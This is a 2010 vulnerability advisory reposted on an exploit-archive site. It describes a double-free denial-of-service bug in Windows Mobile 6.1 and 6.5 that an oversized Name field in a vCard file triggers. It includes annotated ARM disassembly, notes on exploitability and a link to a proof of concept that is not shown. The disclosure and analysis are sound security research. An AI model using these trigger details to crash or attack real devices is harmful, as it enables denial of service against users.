首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Windows Mobile 6.1 and 6.5 Double Free Denial of Service
来源:celilunuver[n0sp4m]gmail.com 作者:musashi 发布时间:2010-10-25  

Vendor: Microsoft
Product: Windows Mobile (6.1 and 6.5)
Vulnerability: Double Free Denial of Service
Tested vulnerable versions: Windows Mobile 6.1 and 6.5
Tested on : HTC Touch (WM 6.1), HTC Touch2 (WM 6.5)
CREDITS: Celil Ünüver from SecurityArchitect.Org
CONTACT: celilunuver[n0sp4m]gmail.com

Vulnerability Details and Analysis:

The vulnerability is a double free. It occurs when multiple buffers are allocated to handle a very large Name (N) field in the vCard (.vcf) file. This file can be received by MMS or Bluetooth.
After opening the malformed vcf file, it gives an error dialog. Then it frees the buffers and crashes;

pimutil.dll:

.text:02B73DE0 sub_2B73DE0                             ; CODE XREF: sub_2B74388+1Cp
.text:02B73DE0       STMFD   SP!, {R4,LR}
.text:02B73DE4       MOV     R4, R0
.text:02B73DE8       LDR     R2, [R4,#0xC]
.text:02B73DEC       LDR     R3, =off_2B66DB8
.text:02B73DF0       CMP     R2, #0
.text:02B73DF4       LDRNE   R0, [R4,#8]
.text:02B73DF8       STR     R3, [R4]
.text:02B73DFC       BLNE    sub_2BA6350
.text:02B73E00       LDR     R0, [R4,#8]
.text:02B73E04       BL      sub_2BA56F8 ; sysfreestrng()
.text:02B73E08       LDR     R0, [R4,#0x14] *!*
.text:02B73E0C       BL      sub_2BA56F8 ; sysfreestring
.text:02B73E10       LDR     R0, [R4,#0x14] *!!!!
DOUBLE FREE!!!**
.text:02B73E14       BL      sub_2BA56F8 ; sysfreestring
.text:02B73E18       LDR     R0, [R4,#8]
.text:02B73E1C       BL      sub_2BA56F8
.text:02B73E20       LDR     R3, =(dword_2B66D30+8)
.text:02B73E24       STR     R3, [R4]
.text:02B73E28       LDMFD   SP!, {R4,LR}
.text:02B73E2C       BX      LR

*As you see that the pointer at [R4 + 0x14] is passed to SysFreeString() twice.

text:0271E4C0 SysFreeString                           ; CODE XREF: sub_271AE68+1Cp
.text:0271E4C0                                         ; sub_271AE68+24p ...
.text:0271E4C0                 STMFD   SP!, {R4,LR}
.text:0271E4C4                 CMP     R0, #0
.text:0271E4C8                 BEQ     loc_271E508
.text:0271E4CC                 LDR     R3, =0x1ECD1B8
.text:0271E4D0                 SUB     R4, R0, #8
.text:0271E4D4                 LDR     R0, [R3]
.text:0271E4D8                 BL      sub_27391B8
.text:0271E4DC                 CMP     R0, #0
.text:0271E4E0                 BNE     loc_271E4F4
.text:0271E4E4                 MOV     R0, R4
.text:0271E4E8                 BL      sub_2739168
.text:0271E4EC                 LDMFD   SP!, {R4,LR}
.text:0271E4F0                 BX      LR
.text:0271E4F4 ; ---------------------------------------------------------------------------
.text:0271E4F4
.text:0271E4F4 loc_271E4F4                             ; CODE XREF: SysFreeString+20j
.text:0271E4F4                 LDR     R3, [R4] ----->CRASH !!
.text:0271E4F8                 MOV     R1, R4
.text:0271E4FC                 ADD     R3, R3, #0x19
.text:0271E500                 BIC     R2, R3, #0xF
.text:0271E504                 BL      sub_27295BC
.text:0271E508

*The code at location 0271E4F4  is attempting to extract the 'size' from the heap chunk header.

Exploiting:

Double Frees are usually exploitable but in this case it doesnt look simple. The calls to free() occurs in immediate succession. WinCE supports multi-threading, but this is an extremely hard case to try.. I do not have deep knowledge about WinCE heap structures. So it may be denial of service but I think it can be possible to exploit this vulnerability. (impossible is nothing ! :P)


Proof of Concept:

http://www.exploit-db.com/application/15297

Vendor-Patch Status:

It's 0day :]

Actually I contacted Microsoft but they said ;
"we fixed this issue on WM 6.5 version and we can not publish a bulletin for it" But i m sure that it is not fixed on 6.5 version. I've tested it on several devices which have WM 6.5. Also I've tested it on WM 6.5 Professional Emulator (which can be downloaded from MS Pages) , it crashes too....


Last Words:
We are not dead , just busy !

Greets to: SecurityArchitect Members (Ulascan) , Hellcode, murderkey ...

Links:
www.securityarchitect.org
blog . securityarchitect . org


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Shockwave player rcsL ch
·Sawmill Enterprise < v8.1.7.3
·LibSMI smiGetNode Buffer Overf
·Altova DatabaseSpy 2011 Projec
·MS10-070 ASP.NET Auto-Decrypto
·Spider Player 2.4.5 Denial of
·Winamp 5.5.8 (in_mod plugin) S
·GNU C library dynamic linker L
·Fat Player Media Player 0.6b0
·RarmaRadio v2.52 (.m3u) Denial
·AnyDVD <= 6.7.1.0 Denial Of Se
·HP Data Protector Media Operat
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved